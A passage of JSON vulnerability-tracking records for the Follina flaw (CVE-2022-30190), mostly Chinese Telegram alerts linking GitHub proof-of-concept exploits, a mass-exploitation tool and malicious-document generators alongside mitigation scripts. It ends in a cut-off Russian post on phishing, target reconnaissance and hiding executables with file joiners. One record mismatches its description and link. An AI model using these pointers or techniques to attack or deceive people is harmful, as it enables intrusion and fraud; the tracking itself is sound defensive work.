"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aD\u00e9sactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un d\u00e9ploiement en masse\nURL\uff1ahttps://github.com/Rojacur/FollinaPatcherCLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T16:32:50.000000Z"}, {"uuid": "ecfeaff9-ee26-4832-85f2-5fb3af6fb7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aServer to host/activate Follina payloads &amp; generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)\nURL\uff1ahttps://github.com/dsibilio/follina-spring\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T22:51:50.000000Z"}, {"uuid": "30f9b6f9-9f8b-43e9-b57d-4571d29d5fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aNotes related to CVE-2022-30190\nURL\uff1ahttps://github.com/abhirules27/Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T21:29:39.000000Z"}, {"uuid": "7a492c1f-3f8a-43e1-933a-b9e426bd5945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2326", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Office Word Rce \u590d\u73b0(CVE-2022-30190)\nURL\uff1ahttps://github.com/bytecaps/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T13:19:45.000000Z"}, {"uuid": "9ab94737-5845-43b1-a5c3-78c08734e73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190  Follina POC\nURL\uff1ahttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T06:51:55.000000Z"}, {"uuid": "a58c4790-0744-4ca5-9b6d-13ab98ae1cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2355", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft\nURL\uff1ahttps://github.com/rouben/CVE-2022-30190-NSIS\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T19:05:58.000000Z"}, {"uuid": "38d9e479-dea2-4c0a-bb43-b8a8d2094309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2343", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:38:46.000000Z"}, {"uuid": "17447392-e9ce-4883-bfc5-1ae66287c7e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2342", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aFollina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go\nURL\uff1ahttps://github.com/dwisiswant0/gollina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:28:12.000000Z"}, {"uuid": "990233c4-fb7c-4d0c-bd8e-9fcb192c361f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2456", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Support Diagnostic Tool (CVE-2022-30190)\nURL\uff1ahttps://github.com/joshuavanderpoll/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T10:21:21.000000Z"}, {"uuid": "e221e627-9788-4948-836e-13df4592ff95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2473", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\nURL\uff1ahttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T09:37:06.000000Z"}, {"uuid": "ff5a96c7-d2fb-4d2c-9546-8aaa81508d3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2337", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 remediation via removal of ms-msdt from Windows registry\nURL\uff1ahttps://github.com/PaddlingCode/cve-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T23:41:30.000000Z"}, {"uuid": "554f8051-ef5e-4260-a0e1-80169679bd64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2361", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\nURL\uff1ahttps://github.com/rayorole/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T21:45:46.000000Z"}, {"uuid": "310c0377-88db-45db-a305-bb73619bf7db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2468", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept of CVE-2022-30190\nURL\uff1ahttps://github.com/Malwareman007/Deathnote\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-08T11:03:22.000000Z"}, {"uuid": "06ac6a55-762d-4a85-ba2f-dd7045964374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2506", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1awriteup and poc for [CVE-2022-26809]  CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8\nURL\uff1ahttps://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-14T13:03:21.000000Z"}, {"uuid": "0474f625-dc6c-4e2d-ab25-1024f804fafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:34:54.000000Z"}, {"uuid": "48b5e66e-9c6b-4691-a7c0-85530ce8cdbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2358", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRemoves the ability for MSDT to run, in response to CVE-2022-30190 (Follina)\nURL\uff1ahttps://github.com/Cosmo121/Follina-Remediation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T20:38:18.000000Z"}, {"uuid": "ccb6b845-9eba-4d09-9a7a-7a66c523b3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2369", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA tool written in Go that scans files &amp; directories for the Follina exploit (CVE-2022-30190)\nURL\uff1ahttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T06:55:29.000000Z"}, {"uuid": "7a6aa9f4-44b4-455b-af1c-23f6185c85e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2329", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT\nURL\uff1ahttps://github.com/kdk2933/msdt-follina-office\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T17:59:12.000000Z"}, {"uuid": "0e695757-b03a-4943-9044-5862004d13ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2328", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPicking up processes that have triggered ASR related to CVE-2022-30190\nURL\uff1ahttps://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T16:14:34.000000Z"}, {"uuid": "b87861ad-3fa5-412a-a66d-725cafa51f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2474", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRepository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.\nURL\uff1ahttps://github.com/b401/Clickstudio-compromised-certificate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T10:07:52.000000Z"}, {"uuid": "a9029565-1ebd-4ced-af7f-4383b0a63651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2367", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMSDT protocol disabler (CVE-2022-30190 patch tool)\nURL\uff1ahttps://github.com/gamingwithevets/msdt-disable\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T02:49:08.000000Z"}, {"uuid": "0ed376fd-6ba1-426b-91e0-ef52c0fe923f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2390", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft's recommended mitigation for CVE-2022-30190 using Powershell\nURL\uff1ahttps://github.com/hilt86/cve-2022-30190-mitigate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-03T06:07:30.000000Z"}, {"uuid": "78020955-bba2-478d-8d8d-b1e0517247f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.\nURL\uff1ahttps://github.com/jeffymcjeffface/five-nights-at-follina-s\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-08-05T02:37:51.000000Z"}, {"uuid": "29293b38-533b-4ed8-b5c3-7b01c3374508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2497", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \nURL\uff1ahttps://github.com/safakTamsesCS/PicusSecurity4.Week.Repo\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-12T20:51:23.000000Z"}, {"uuid": "2dbcae90-089f-4424-aa91-06f0d0e1d3bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2492", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aproof of concept to CVE-2022-30190 (follina)\nURL\uff1ahttps://github.com/AmitNiz/follina_cve_2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-11T15:52:13.000000Z"}, {"uuid": "d4ebccbc-d828-4181-9675-523d35525bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of CVE-2022-30190 in C\nURL\uff1ahttps://github.com/mattjmillner/CVE-Smackdown\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-10T18:21:26.000000Z"}, {"uuid": "5866d95c-5477-4613-9628-43aa0dc4028d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2600", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-Follina-PowerPoint-Version\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T09:15:48.000000Z"}, {"uuid": "c1822157-6881-466e-9c6c-e68aa33e81b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2751", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDetection and Remdiation of  the Follina MSDT Vulnerability 
(CVE-2022-30190)\nURL\uff1ahttps://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-21T07:26:21.000000Z"}, {"uuid": "b295642f-ab6b-40a2-9a98-181150426736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3463", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.\nURL\uff1ahttps://github.com/0xAbbarhSF/FollinaXploit\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-23T23:02:20.000000Z"}, {"uuid": "efb22454-fee1-4393-af05-f3719c92830c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/184", "content": "\u0427\u0430\u0441\u0442\u044c 1 - \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f\n\n\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0440\u043e \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044e. \n\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f  ? 
\n\u042d\u0442\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u043d\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0441\u0434\u0435\u043b\u0430\u043b \u0442\u043e \u0447\u0442\u043e \u0431\u044b \u0445\u043e\u0447\u0435\u0448\u044c. \n\n\u041d\u043e \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u044b \u0438 \u043a\u0430\u043a\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043a \u043d\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 ? \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438 \u0441\u0430\u043c\u044b\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0432\u0438\u0434 \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433. \n\u0414\u043b\u044f \u043c\u0435\u043d\u044f \u0444\u0438\u0448\u0438\u043d\u0433 \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0432\u0430 \u0432\u0438\u0434\u0430 - \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 (\u043a\u0442\u043e \u0448\u0430\u0440\u0438\u0442 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u044c) . 
\n\"\u041c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0432\u0438\u0434\" \u044d\u0442\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0435 \u043e\u0431\u0449\u0438\u0435 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0438\u0441\u0435\u043c \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 ,\u0441\u0441\u044b\u043b\u043a\u0430\u043c\u0438, \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u043e\u0431 \u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0438 \u0442\u0434 \u0441 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043e\u0431\u0449\u0435\u0439 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0435\u0439.  \n\u0410 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 - \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0437\u0430\u043c\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 . 
\u0414\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u0430-\u043b\u044f OSINT \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0446\u0435\u043b\u0438 \u0438 \u043f\u043e\u0442\u043e\u043c \u0443\u0436\u0435 \u0433\u0440\u0430\u043c\u043e\u0442\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438.  \n\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u0441\u043f\u0440\u044f\u0442\u0430\u0442\u044c exe \u0432 \u043b\u044e\u0431\u043e\u043c \u0434\u0440\u0443\u0433\u043e\u043c \u0444\u043e\u0440\u043c\u0430\u0442\u0435 \u044e\u0437\u0430\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0436\u043e\u0439\u043d\u0435\u0440\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0441 asm exe \u0444\u0430\u043b\u043e\u0432 . \u041f\u043e\u0442\u043e\u043c \u043f\u0440\u0438\u0434\u0443\u043c\u044b\u0432\u0430\u044e \u0431\u043e\u043b\u0435\u0435 \u043b\u0438 \u043c\u0435\u043d\u0435\u0435 \u0443\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u043b\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0435(\u0430\u043c). 
